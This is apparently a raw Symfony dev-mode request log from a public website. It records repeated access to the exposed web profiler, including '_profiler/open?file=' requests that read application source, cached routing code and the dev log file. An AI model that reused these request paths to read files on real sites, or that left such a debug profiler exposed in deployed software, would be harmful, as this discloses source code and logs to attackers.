  10066. [2025-12-21 06:41:08] request.INFO: Matched route "_profiler_search_results". {"route":"_profiler_search_results","route_parameters":{"_controller":"web_profiler.controller.profiler:searchResultsAction","token":"7061e0","_route":"_profiler_search_results"},"request_uri":"https://web.unda.co/_profiler/7061e0/search/results?ip=112.86.225.168","method":"GET"} []
  10067. [2025-12-21 06:41:08] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?ip=112.86.225.168","method":"GET"} []
  10068. [2025-12-21 06:41:09] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"7061e0","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/7061e0?panel=request","method":"GET"} []
  10069. [2025-12-21 06:41:09] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?panel=request","method":"GET"} []
  10070. [2025-12-21 06:41:09] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"latest","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/latest?ip=216.73.216.212","method":"GET"} []
  10071. [2025-12-21 06:41:09] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?ip=216.73.216.212","method":"GET"} []
  10072. [2025-12-21 06:41:09] request.INFO: Matched route "_profiler_open_file". {"route":"_profiler_open_file","route_parameters":{"_controller":"web_profiler.controller.profiler:openAction","_route":"_profiler_open_file"},"request_uri":"https://web.unda.co/_profiler/open?file=vendor%2Fsymfony%2Fsymfony%2Fsrc%2FSymfony%2FComponent%2FHttpKernel%2FHttpKernel.php&line=68","method":"GET"} []
  10073. [2025-12-21 06:41:09] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"4b64dc","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/4b64dc","method":"GET"} []
  10074. [2025-12-21 06:41:10] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar","method":"GET"} []
  10075. [2025-12-21 06:41:20] request.INFO: Matched route "_profiler_open_file". {"route":"_profiler_open_file","route_parameters":{"_controller":"web_profiler.controller.profiler:openAction","_route":"_profiler_open_file"},"request_uri":"https://web.unda.co/_profiler/open?file=vendor%2Fsymfony%2Fsymfony%2Fsrc%2FSymfony%2FBundle%2FTwigBundle%2FResources%2Fviews%2Fexception.css.twig&line=1","method":"GET"} []
  10076. [2025-12-21 06:41:20] request.INFO: Matched route "_profiler_open_file". {"route":"_profiler_open_file","route_parameters":{"_controller":"web_profiler.controller.profiler:openAction","_route":"_profiler_open_file"},"request_uri":"https://web.unda.co/_profiler/open?file=vendor%2Fsymfony%2Fsymfony%2Fsrc%2FSymfony%2FComponent%2FEventDispatcher%2FEventDispatcher.php&line=214","method":"GET"} []
  10077. [2025-12-21 06:41:20] request.INFO: Matched route "_profiler_open_file". {"route":"_profiler_open_file","route_parameters":{"_controller":"web_profiler.controller.profiler:openAction","_route":"_profiler_open_file"},"request_uri":"https://web.unda.co/_profiler/open?file=vendor%2Fsymfony%2Fsymfony%2Fsrc%2FSymfony%2FComponent%2FRouting%2FMatcher%2FUrlMatcher.php&line=93","method":"GET"} []
  10078. [2025-12-21 06:41:21] request.INFO: Matched route "_profiler_open_file". {"route":"_profiler_open_file","route_parameters":{"_controller":"web_profiler.controller.profiler:openAction","_route":"_profiler_open_file"},"request_uri":"https://web.unda.co/_profiler/open?file=vendor%2Fsymfony%2Fsymfony%2Fsrc%2FSymfony%2FComponent%2FEventDispatcher%2FEventDispatcher.php&line=44","method":"GET"} []
  10079. [2025-12-21 06:41:43] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"2882d9","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/2882d9?panel=db","method":"GET"} []
  10080. [2025-12-21 06:41:43] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=db","method":"GET"} []
  10081. [2025-12-21 06:42:07] request.INFO: Matched route "_profiler_open_file". {"route":"_profiler_open_file","route_parameters":{"_controller":"web_profiler.controller.profiler:openAction","_route":"_profiler_open_file"},"request_uri":"https://web.unda.co/_profiler/open?file=vendor%2Fsymfony%2Fsymfony%2Fsrc%2FSymfony%2FBundle%2FTwigBundle%2FResources%2Fviews%2Flayout.html.twig&line=1","method":"GET"} []
  10082. [2025-12-21 06:42:07] request.INFO: Matched route "_profiler_open_file". {"route":"_profiler_open_file","route_parameters":{"_controller":"web_profiler.controller.profiler:openAction","_route":"_profiler_open_file"},"request_uri":"https://web.unda.co/_profiler/open?file=vendor%2Fsymfony%2Fsymfony%2Fsrc%2FSymfony%2FComponent%2FSecurity%2FCore%2FAuthorization%2FVoter%2FExpressionVoter.php&line=27","method":"GET"} []
  10083. [2025-12-21 06:42:07] request.INFO: Matched route "_profiler_open_file". {"route":"_profiler_open_file","route_parameters":{"_controller":"web_profiler.controller.profiler:openAction","_route":"_profiler_open_file"},"request_uri":"https://web.unda.co/_profiler/open?file=vendor%2Fsymfony%2Fsymfony%2Fsrc%2FSymfony%2FBundle%2FTwigBundle%2FResources%2Fviews%2FException%2Fexception.html.twig&line=1","method":"GET"} []
  10084. [2025-12-21 06:42:08] request.INFO: Matched route "_profiler_open_file". {"route":"_profiler_open_file","route_parameters":{"_controller":"web_profiler.controller.profiler:openAction","_route":"_profiler_open_file"},"request_uri":"https://web.unda.co/_profiler/open?file=vendor%2Fsymfony%2Fsymfony%2Fsrc%2FSymfony%2FComponent%2FEventDispatcher%2FDebug%2FTraceableEventDispatcher.php&line=143","method":"GET"} []
  10085. [2025-12-21 06:42:36] request.INFO: Matched route "_profiler_open_file". {"route":"_profiler_open_file","route_parameters":{"_controller":"web_profiler.controller.profiler:openAction","_route":"_profiler_open_file"},"request_uri":"https://web.unda.co/_profiler/open?file=vendor%2Fsymfony%2Fsymfony%2Fsrc%2FSymfony%2FBundle%2FTwigBundle%2FResources%2Fviews%2Fimages%2Ficon-support.svg&line=1","method":"GET"} []
  10086. [2025-12-21 06:42:36] request.INFO: Matched route "_profiler_open_file". {"route":"_profiler_open_file","route_parameters":{"_controller":"web_profiler.controller.profiler:openAction","_route":"_profiler_open_file"},"request_uri":"https://web.unda.co/_profiler/open?file=vendor%2Fsymfony%2Fsymfony%2Fsrc%2FSymfony%2FBundle%2FTwigBundle%2FResources%2Fviews%2Fimages%2Fsymfony-logo.svg&line=1","method":"GET"} []
  10087. [2025-12-21 06:42:37] request.INFO: Matched route "_profiler_open_file". {"route":"_profiler_open_file","route_parameters":{"_controller":"web_profiler.controller.profiler:openAction","_route":"_profiler_open_file"},"request_uri":"https://web.unda.co/_profiler/open?file=vendor%2Fsymfony%2Fsymfony%2Fsrc%2FSymfony%2FBundle%2FTwigBundle%2FResources%2Fviews%2FException%2Flogs.html.twig&line=1","method":"GET"} []
  10088. [2025-12-21 06:42:37] request.INFO: Matched route "_profiler_open_file". {"route":"_profiler_open_file","route_parameters":{"_controller":"web_profiler.controller.profiler:openAction","_route":"_profiler_open_file"},"request_uri":"https://web.unda.co/_profiler/open?file=src%2FHona%2FWebBundle%2FController%2FDefaultController.php&line=14","method":"GET"} []
  10089. [2025-12-21 06:42:43] request.INFO: Matched route "_profiler_open_file". {"route":"_profiler_open_file","route_parameters":{"_controller":"web_profiler.controller.profiler:openAction","_route":"_profiler_open_file"},"request_uri":"https://web.unda.co/_profiler/open?file=vendor%2Fsymfony%2Fsymfony%2Fsrc%2FSymfony%2FBundle%2FTwigBundle%2FResources%2Fviews%2Fimages%2Ficon-plus-square.svg&line=1","method":"GET"} []
  10090. [2025-12-21 06:42:43] request.INFO: Matched route "_profiler_open_file". {"route":"_profiler_open_file","route_parameters":{"_controller":"web_profiler.controller.profiler:openAction","_route":"_profiler_open_file"},"request_uri":"https://web.unda.co/_profiler/open?file=vendor%2Fsymfony%2Fsymfony%2Fsrc%2FSymfony%2FBundle%2FTwigBundle%2FResources%2Fviews%2FException%2Ftraces.txt.twig&line=1","method":"GET"} []
  10091. [2025-12-21 06:42:43] request.INFO: Matched route "_profiler_open_file". {"route":"_profiler_open_file","route_parameters":{"_controller":"web_profiler.controller.profiler:openAction","_route":"_profiler_open_file"},"request_uri":"https://web.unda.co/_profiler/open?file=vendor%2Fsymfony%2Fsymfony%2Fsrc%2FSymfony%2FBundle%2FTwigBundle%2FResources%2Fviews%2Fimages%2Ficon-plus-square-o.svg&line=1","method":"GET"} []
  10092. [2025-12-21 06:42:44] request.INFO: Matched route "_profiler_open_file". {"route":"_profiler_open_file","route_parameters":{"_controller":"web_profiler.controller.profiler:openAction","_route":"_profiler_open_file"},"request_uri":"https://web.unda.co/_profiler/open?file=vendor%2Fsymfony%2Fsymfony%2Fsrc%2FSymfony%2FBundle%2FTwigBundle%2FResources%2Fviews%2FException%2Ftrace.txt.twig&line=1","method":"GET"} []
  10093. [2025-12-21 06:42:48] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"latest","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/latest?ip=52.167.144.177&limit=10","method":"GET"} []
  10094. [2025-12-21 06:42:48] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?ip=52.167.144.177&limit=10","method":"GET"} []
  10095. [2025-12-21 06:43:40] request.INFO: Matched route "_profiler_open_file". {"route":"_profiler_open_file","route_parameters":{"_controller":"web_profiler.controller.profiler:openAction","_route":"_profiler_open_file"},"request_uri":"https://web.unda.co/_profiler/open?file=vendor%2Fsymfony%2Fsymfony%2Fsrc%2FSymfony%2FBundle%2FTwigBundle%2FResources%2Fviews%2Fimages%2Ficon-minus-square-o.svg&line=1","method":"GET"} []
  10096. [2025-12-21 06:43:40] request.INFO: Matched route "_profiler_open_file". {"route":"_profiler_open_file","route_parameters":{"_controller":"web_profiler.controller.profiler:openAction","_route":"_profiler_open_file"},"request_uri":"https://web.unda.co/_profiler/open?file=vendor%2Fsymfony%2Fsymfony%2Fsrc%2FSymfony%2FBundle%2FTwigBundle%2FResources%2Fviews%2Fimages%2Fchevron-right.svg&line=1","method":"GET"} []
  10097. [2025-12-21 06:43:40] request.INFO: Matched route "_profiler_open_file". {"route":"_profiler_open_file","route_parameters":{"_controller":"web_profiler.controller.profiler:openAction","_route":"_profiler_open_file"},"request_uri":"https://web.unda.co/_profiler/open?file=var%2Fcache%2Fdev%2FappDevDebugProjectContainerUrlMatcher.php&line=2103","method":"GET"} []
  10098. [2025-12-21 06:43:41] request.INFO: Matched route "_profiler_open_file". {"route":"_profiler_open_file","route_parameters":{"_controller":"web_profiler.controller.profiler:openAction","_route":"_profiler_open_file"},"request_uri":"https://web.unda.co/_profiler/open?file=vendor%2Fsymfony%2Fsymfony%2Fsrc%2FSymfony%2FBundle%2FTwigBundle%2FResources%2Fviews%2Fimages%2Ficon-book.svg&line=1","method":"GET"} []
  10099. [2025-12-21 06:43:55] request.INFO: Matched route "_profiler_open_file". {"route":"_profiler_open_file","route_parameters":{"_controller":"web_profiler.controller.profiler:openAction","_route":"_profiler_open_file"},"request_uri":"https://web.unda.co/_profiler/open?file=var%2Flogs%2Fdev.log&line=0","method":"GET"} []